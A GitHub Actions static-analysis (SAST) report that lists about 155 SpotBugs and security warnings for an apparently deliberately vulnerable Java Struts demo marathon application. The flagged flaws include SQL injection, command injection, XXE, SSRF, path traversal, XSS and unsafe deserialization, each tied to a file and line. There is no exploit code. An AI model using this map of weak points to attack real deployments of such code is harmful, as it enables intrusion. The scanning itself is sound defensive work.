SAST Scans #4
dansdAnnotations
155 warnings
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ChangePasswordAction.java#L30
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ChangePasswordForm in demo.action.ChangePasswordAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
IMPROPER_UNICODE:
src/main/java/demo/action/ChangePasswordAction.java#L31
Improper handling of Unicode transformations such as case mapping and normalization.
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/ChangePasswordAction.java#L37
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ChangePasswordAction.java#L22
demo.action.ChangePasswordAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/CreateAccountAction.java#L29
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.CreateAccountForm in demo.action.CreateAccountAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/CreateAccountAction.java#L20
demo.action.CreateAccountAction is a Struts 1 endpoint (Action)
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/DeleteAllResultsAction.java#L33
The method getParameter returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/DeleteAllResultsAction.java#L37
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/DeleteAllResultsAction.java#L23
demo.action.DeleteAllResultsAction is a Struts 1 endpoint (Action)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/EditResultsViaImportAction.java#L14
demo.action.EditResultsViaImportAction is a Struts 1 endpoint (Action)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/EditRunnerPhotoAction.java#L19
demo.action.EditRunnerPhotoAction is a Struts 1 endpoint (Action)
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/LoadDynamicRunnerDetailsAction.java#L32
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/LoadDynamicRunnerDetailsAction.java#L19
demo.action.LoadDynamicRunnerDetailsAction is a Struts 1 endpoint (Action)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/LogoutAction.java#L16
demo.action.LogoutAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/SearchRunnerAction.java#L29
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.SearchRunnerForm in demo.action.SearchRunnerAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/SearchRunnerAction.java#L21
demo.action.SearchRunnerAction is a Struts 1 endpoint (Action)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowMarathonsAction.java#L20
demo.action.ShowMarathonsAction is a Struts 1 endpoint (Action)
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowResultsAction.java#L29
The method getParameter returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowResultsAction.java#L38
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowResultsAction.java#L19
demo.action.ShowResultsAction is a Struts 1 endpoint (Action)
|
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/ShowRunnerAction.java#L42
Possible information exposure through an error message
|
|
REC_CATCH_EXCEPTION:
src/main/java/demo/action/ShowRunnerAction.java#L41
Exception is caught when Exception is not thrown in demo.action.ShowRunnerAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowRunnerAction.java#L28
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerAction.java#L19
demo.action.ShowRunnerAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ShowRunnerAttendancesAction.java#L46
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerAttendancesForm in demo.action.ShowRunnerAttendancesAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerAttendancesAction.java#L23
demo.action.ShowRunnerAttendancesAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/ShowRunnerProfileAction.java#L58
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerForm in demo.action.ShowRunnerProfileAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
HTTPONLY_COOKIE:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
Cookie without the HttpOnly flag could be read by a malicious script in the browser
|
|
HTTP_RESPONSE_SPLITTING:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
This use of javax/servlet/http/Cookie.<init>(Ljava/lang/String;Ljava/lang/String;)V might be used to include CRLF characters into HTTP headers
|
|
INSECURE_COOKIE:
src/main/java/demo/action/ShowRunnerProfileAction.java#L67
Cookie without the secure flag could be sent in clear text if a HTTP URL is visited
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/ShowRunnerProfileAction.java#L35
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowRunnerProfileAction.java#L21
demo.action.ShowRunnerProfileAction is a Struts 1 endpoint (Action)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/ShowUnregisteredAction.java#L18
demo.action.ShowUnregisteredAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateResultsAction.java#L27
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ResultsForm in demo.action.UpdateResultsAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateResultsAction.java#L19
demo.action.UpdateResultsAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L38
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.ResultsImportForm in demo.action.UpdateResultsViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L41
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateResultsViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
IMPROPER_UNICODE:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L42
Improper handling of Unicode transformations such as case mapping and normalization.
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L30
demo.action.UpdateResultsViaImportAction is a Struts 1 endpoint (Action)
|
|
XXE_DOCUMENT:
src/main/java/demo/action/UpdateResultsViaImportAction.java#L52
The use of DocumentBuilder.parse(...) (DocumentBuilder) is vulnerable to XML External Entity attacks
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L37
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerAttendancesForm in demo.action.UpdateRunnerAttendancesAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
DLS_DEAD_LOCAL_STORE:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L86
Dead store to $L5 in demo.action.UpdateRunnerAttendancesAction.deserializeInput(String)
|
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L64
Possible information exposure through an error message
|
|
OBJECT_DESERIALIZATION:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L86
Object deserialization is used in demo.action.UpdateRunnerAttendancesAction.deserializeInput(String)
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L50
The method getParameter returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L59
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerAttendancesAction.java#L27
demo.action.UpdateRunnerAttendancesAction is a Struts 1 endpoint (Action)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L86
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerPhotoForm in demo.action.UpdateRunnerPhotoAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
COMMAND_INJECTION:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L196
This usage of java/lang/Runtime.exec(Ljava/lang/String;)Ljava/lang/Process; can be vulnerable to Command Injection
|
|
COMMAND_INJECTION:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L201
This usage of java/lang/Runtime.exec([Ljava/lang/String;[Ljava/lang/String;Ljava/io/File;)Ljava/lang/Process; can be vulnerable to Command Injection
|
|
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L40
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateRunnerPhotoAction.<static initializer for UpdateRunnerPhotoAction>()
|
|
DM_CONVERT_CASE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L117
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
|
IMPROPER_UNICODE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L117
Improper handling of Unicode transformations such as case mapping and normalization.
|
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L146
Possible information exposure through an error message
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L135
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L48
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L65
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L149
Exceptional return value of java.io.File.delete() ignored in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L133
Exceptional return value of java.io.File.mkdir() ignored in demo.action.UpdateRunnerPhotoAction.checkAndSaveImage(File, Upload, String, String, File)
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L51
Exceptional return value of java.io.File.mkdirs() ignored in demo.action.UpdateRunnerPhotoAction.getPhotoFolder(ServletContext)
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L69
Exceptional return value of java.io.File.mkdirs() ignored in demo.action.UpdateRunnerPhotoAction.getVirusScannerScript(ServletContext)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L36
demo.action.UpdateRunnerPhotoAction is a Struts 1 endpoint (Action)
|
|
DM_DEFAULT_ENCODING:
src/main/java/demo/action/UpdateRunnerPhotoAction.java#L176
Found reliance on default encoding in demo.action.UpdateRunnerPhotoAction$StreamGobbler.run(): new java.io.InputStreamReader(InputStream)
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L41
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerPhotoImportForm in demo.action.UpdateRunnerPhotoViaImportAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L95
demo.action.UpdateRunnerPhotoViaImportAction.saveFileFromURL(URL, File) may fail to clean up java.io.OutputStream on checked exception
|
|
OS_OPEN_STREAM_EXCEPTION_PATH:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L95
demo.action.UpdateRunnerPhotoViaImportAction.saveFileFromURL(URL, File) may fail to close stream on exception
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L83
Exceptional return value of java.io.File.delete() ignored in demo.action.UpdateRunnerPhotoViaImportAction.fetchPhoto(String, String)
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L29
demo.action.UpdateRunnerPhotoViaImportAction is a Struts 1 endpoint (Action)
|
|
URLCONNECTION_SSRF_FD:
src/main/java/demo/action/UpdateRunnerPhotoViaImportAction.java#L89
This web server request could be used by an attacker to expose internal services and filesystem.
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L40
Unchecked/unconfirmed cast from org.apache.struts.action.ActionForm to demo.form.RunnerForm in demo.action.UpdateRunnerProfileAction.execute(ActionMapping, ActionForm, HttpServletRequest, HttpServletResponse)
|
|
DLS_DEAD_LOCAL_STORE:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L77
Dead store to someMap in demo.action.UpdateRunnerProfileAction.unmarshalInput(String)
|
|
DM_DEFAULT_ENCODING:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L73
Found reliance on default encoding in demo.action.UpdateRunnerProfileAction.unmarshalInput(String): new String(byte[])
|
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L59
Possible information exposure through an error message
|
|
SERVLET_PARAMETER:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L54
The method getParameter returns a String value that is controlled by the client
|
|
STRUTS1_ENDPOINT:
src/main/java/demo/action/UpdateRunnerProfileAction.java#L27
demo.action.UpdateRunnerProfileAction is a Struts 1 endpoint (Action)
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/AttendanceDAO.java#L27
demo.dao.AttendanceDAO.loadAttendingMarathons(Runner) may fail to clean up java.sql.Statement on checked exception
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/AttendanceDAO.java#L57
demo.dao.AttendanceDAO.updateAttendances(Runner, List) may fail to clean up java.sql.Statement on checked exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/AttendanceDAO.java#L27
demo.dao.AttendanceDAO.loadAttendingMarathons(Runner) may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/AttendanceDAO.java#L58
demo.dao.AttendanceDAO.updateAttendances(Runner, List) may fail to close database resource on exception
|
|
DE_MIGHT_IGNORE:
src/main/java/demo/dao/DAOUtils.java#L40
demo.dao.DAOUtils.isAlive() might ignore java.sql.SQLException
|
|
INFORMATION_EXPOSURE_THROUGH_AN_ERROR_MESSAGE:
src/main/java/demo/dao/DAOUtils.java#L34
Possible information exposure through an error message
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/MarathonDAO.java#L26
demo.dao.MarathonDAO.loadMarathons() may fail to clean up java.sql.Statement on checked exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/MarathonDAO.java#L26
demo.dao.MarathonDAO.loadMarathons() may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/ResultsDAO.java#L30
demo.dao.ResultsDAO.loadResults(String, boolean) may fail to close database resource on exception
|
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/ResultsDAO.java#L32
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/ResultsDAO.java#L32
demo.dao.ResultsDAO.loadResults(String, boolean) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
|
DM_CONVERT_CASE:
src/main/java/demo/dao/RunnerDAO.java#L70
Use of non-localized String.toUpperCase() or String.toLowerCase() in demo.dao.RunnerDAO.searchRunners(String)
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L107
demo.dao.RunnerDAO.hasRunnerFinished(String) may fail to clean up java.sql.Statement on checked exception
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L27
demo.dao.RunnerDAO.loadRunner(long) may fail to clean up java.sql.Statement on checked exception
|
|
OBL_UNSATISFIED_OBLIGATION_EXCEPTION_EDGE:
src/main/java/demo/dao/RunnerDAO.java#L45
demo.dao.RunnerDAO.loadRunnerByName(String) may fail to clean up java.sql.Statement on checked exception
|
|
ODR_OPEN_DATABASE_RESOURCE:
src/main/java/demo/dao/RunnerDAO.java#L194
demo.dao.RunnerDAO.getAllRunners() may fail to close PreparedStatement
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L214
demo.dao.RunnerDAO.getRunnersNotRegisteredOnAnyDiscipline() may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L107
demo.dao.RunnerDAO.hasRunnerFinished(String) may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L27
demo.dao.RunnerDAO.loadRunner(long) may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L45
demo.dao.RunnerDAO.loadRunnerByName(String) may fail to close database resource on exception
|
|
ODR_OPEN_DATABASE_RESOURCE_EXCEPTION_PATH:
src/main/java/demo/dao/RunnerDAO.java#L67
demo.dao.RunnerDAO.searchRunners(String) may fail to close database resource on exception
|
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L108
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L125
This use of java/sql/Connection.prepareStatement(Ljava/lang/String;)Ljava/sql/PreparedStatement; can be vulnerable to SQL injection (with JDBC)
|
|
SQL_INJECTION_JDBC:
src/main/java/demo/dao/RunnerDAO.java#L68
This use of java/sql/Statement.executeQuery(Ljava/lang/String;)Ljava/sql/ResultSet; can be vulnerable to SQL injection (with JDBC)
|
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/RunnerDAO.java#L108
demo.dao.RunnerDAO.hasRunnerFinished(String) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
|
SQL_NONCONSTANT_STRING_PASSED_TO_EXECUTE:
src/main/java/demo/dao/RunnerDAO.java#L68
demo.dao.RunnerDAO.searchRunners(String) passes a nonconstant String to an execute or addBatch method on an SQL statement
|
|
SQL_PREPARED_STATEMENT_GENERATED_FROM_NONCONSTANT_STRING:
src/main/java/demo/dao/RunnerDAO.java#L125
A prepared statement is generated from a nonconstant String in demo.dao.RunnerDAO.createRunner(String, String, String, String, String, String, String, String)
|
|
OBL_UNSATISFIED_OBLIGATION:
src/main/java/demo/dao/SystemDAO.java#L20
demo.dao.SystemDAO.createAccount(String, String) may fail to clean up java.sql.Statement
|
|
ODR_OPEN_DATABASE_RESOURCE:
src/main/java/demo/dao/SystemDAO.java#L20
demo.dao.SystemDAO.createAccount(String, String) may fail to close PreparedStatement
|
|
CRLF_INJECTION_LOGS:
src/main/java/demo/filter/AccessLogFilter.java#L47
This use of java/util/logging/Logger.info(Ljava/lang/String;)V might be used to include CRLF characters into log messages
|
|
DM_DEFAULT_ENCODING:
src/main/java/demo/filter/AccessLogFilter.java#L52
Found reliance on default encoding in demo.filter.AccessLogFilter.init(FilterConfig): new java.io.FileWriter(File)
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/filter/AccessLogFilter.java#L45
This API (java/io/File.<init>(Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/filter/AccessLogFilter.java#L51
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
RV_RETURN_VALUE_IGNORED_BAD_PRACTICE:
src/main/java/demo/filter/AccessLogFilter.java#L49
Exceptional return value of java.io.File.mkdir() ignored in demo.filter.AccessLogFilter.init(FilterConfig)
|
|
SERVLET_HEADER_USER_AGENT:
src/main/java/demo/filter/AccessLogFilter.java#L82
The header "User-Agent" can easily be spoofed by the client
|
|
BC_UNCONFIRMED_CAST:
src/main/java/demo/filter/SecurityFilter.java#L40
Unchecked/unconfirmed cast from javax.servlet.ServletResponse to javax.servlet.http.HttpServletResponse in demo.filter.SecurityFilter.doFilter(ServletRequest, ServletResponse, FilterChain)
|
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L95
The method getParameterNames returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L98
The method getParameter returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L119
The method getParameterNames returns a String value that is controlled by the client
|
|
SERVLET_PARAMETER:
src/main/java/demo/filter/SecurityFilter.java#L123
The method getParameter returns a String value that is controlled by the client
|
|
XSS_SERVLET:
src/main/java/demo/filter/SecurityFilter.java#L60
This use of java/io/PrintWriter.print(Ljava/lang/Object;)V could be vulnerable to XSS in the Servlet
|
|
XSS_SERVLET:
src/main/java/demo/filter/SecurityFilter.java#L62
This use of java/io/PrintWriter.print(Ljava/lang/Object;)V could be vulnerable to XSS in the Servlet
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L83
Confusing to have methods demo.form.CreateAccountForm.getCreditcardNumber() and demo.pojo.Runner.getCreditCardNumber()
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L35
Confusing to have methods demo.form.CreateAccountForm.getFirstname() and demo.service.RunnerRegistration.getFirstName()
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L43
Confusing to have methods demo.form.CreateAccountForm.getLastname() and demo.service.RunnerRegistration.getLastName()
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L27
Confusing to have methods demo.form.CreateAccountForm.getUsername() and demo.service.RunnerRegistration.getUserName()
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L87
Confusing to have methods demo.form.CreateAccountForm.setCreditcardNumber(String) and demo.pojo.Runner.setCreditCardNumber(String)
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L39
Confusing to have methods demo.form.CreateAccountForm.setFirstname(String) and demo.service.RunnerRegistration.setFirstName(String)
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L47
Confusing to have methods demo.form.CreateAccountForm.setLastname(String) and demo.service.RunnerRegistration.setLastName(String)
|
|
NM_CONFUSING:
src/main/java/demo/form/CreateAccountForm.java#L31
Confusing to have methods demo.form.CreateAccountForm.setUsername(String) and demo.service.RunnerRegistration.setUserName(String)
|
|
EI_EXPOSE_REP:
src/main/java/demo/form/RunnerForm.java#L125
demo.form.RunnerForm.getDateOfBirthAsDate() may expose internal representation by returning RunnerForm.dateOfBirth
|
|
UWF_FIELD_NOT_INITIALIZED_IN_CONSTRUCTOR:
src/main/java/demo/pojo/Run.java#L29
Run.finishingSeconds not initialized in constructor and dereferenced in demo.pojo.Run.getFinishingPixels()
|
|
EI_EXPOSE_REP:
src/main/java/demo/pojo/Runner.java#L73
demo.pojo.Runner.getDateOfBirth() may expose internal representation by returning Runner.dateOfBirth
|
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Runner.java#L28
new demo.pojo.Runner(Long, String, String, String, String, String, String, Date, String) may expose internal representation by storing an externally mutable object into Runner.dateOfBirth
|
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Runner.java#L76
demo.pojo.Runner.setDateOfBirth(Date) may expose internal representation by storing an externally mutable object into Runner.dateOfBirth
|
|
EI_EXPOSE_REP:
src/main/java/demo/pojo/Upload.java#L32
demo.pojo.Upload.getData() may expose internal representation by returning Upload.data
|
|
EI_EXPOSE_REP2:
src/main/java/demo/pojo/Upload.java#L36
demo.pojo.Upload.setData(byte[]) may expose internal representation by storing an externally mutable object into Upload.data
|
|
BEAN_PROPERTY_INJECTION:
src/main/java/demo/service/MarathonService.java#L222
JavaBeans property name populated with user controlled parameters
|
|
COOKIE_USAGE:
src/main/java/demo/service/MarathonService.java#L256
Sensitive data may be stored by the application in a cookie
|
|
COOKIE_USAGE:
src/main/java/demo/service/MarathonService.java#L257
Sensitive data may be stored by the application in a cookie
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L52
demo.service.MarathonService.demo.service.MarathonService.checkWinner(String) is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L74
demo.service.MarathonService.demo.service.MarathonService.createRunner(RunnerRegistration) is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L185
demo.service.MarathonService.demo.service.MarathonService.deleteRunnerPhoto(HttpServletRequest, String) is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L111
demo.service.MarathonService.demo.service.MarathonService.getProfilePic(String, int, int) is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L165
demo.service.MarathonService.demo.service.MarathonService.getUnregisteredRunners(HttpServletRequest) is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L35
demo.service.MarathonService.demo.service.MarathonService.listRunners() is a REST Web Service endpoint
|
|
JAXRS_ENDPOINT:
src/main/java/demo/service/MarathonService.java#L210
demo.service.MarathonService.demo.service.MarathonService.updateRunner(HttpServletRequest, String, Map) is a REST Web Service endpoint
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/service/MarathonService.java#L118
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
SIC_INNER_SHOULD_BE_STATIC_ANON:
src/main/java/demo/service/MarathonService.java#L141
The class demo.service.MarathonService$1 could be refactored into a named _static_ inner class
|
|
XSS_SERVLET:
src/main/java/demo/util/MonitoringServlet.java#L39
This use of java/io/PrintWriter.println(Ljava/lang/String;)V could be vulnerable to XSS in the Servlet
|
|
HRS_REQUEST_PARAMETER_TO_HTTP_HEADER:
src/main/java/demo/util/PermalinkServlet.java#L32
HTTP parameter directly written to HTTP header output in demo.util.PermalinkServlet.doGet(HttpServletRequest, HttpServletResponse)
|
|
SERVLET_PARAMETER:
src/main/java/demo/util/PermalinkServlet.java#L27
The method getParameter returns a String value that is controlled by the client
|
|
UNVALIDATED_REDIRECT:
src/main/java/demo/util/PermalinkServlet.java#L32
The following redirection could be used by an attacker to redirect users to a phishing website.
|
|
PATH_TRAVERSAL_IN:
src/main/java/demo/util/PhotoLoader.java#L50
This API (java/io/File.<init>(Ljava/io/File;Ljava/lang/String;)V) reads a file whose location might be specified by user input
|
|
SERVLET_PARAMETER:
src/main/java/demo/util/PhotoLoader.java#L49
The method getParameter returns a String value that is controlled by the client
|
|
MS_PKGPROTECT:
src/main/java/demo/util/SessionListener.java#L42
demo.util.SessionListener.hexArray should be package protected
|
|
TRUST_BOUNDARY_VIOLATION:
src/main/java/demo/util/SessionListener.java#L32
The application mixes trusted and untrusted data in session attributes.
|
|
SAST-Scan
The following actions uses node12 which is deprecated and will be forced to run on node16: jwgmeligmeyling/spotbugs-github-action@master. For more info: https://github.blog/changelog/2023-06-13-github-actions-all-actions-will-run-on-node16-instead-of-node12-by-default/
|
|
SAST-Scan
The following actions use a deprecated Node.js version and will be forced to run on node20: jwgmeligmeyling/spotbugs-github-action@master. For more info: https://github.blog/changelog/2024-03-07-github-actions-all-actions-will-run-on-node20-instead-of-node16-by-default/
|
|
SAST-Scan
Failed minimum severity level. Found vulnerabilities with level 'medium' or higher
|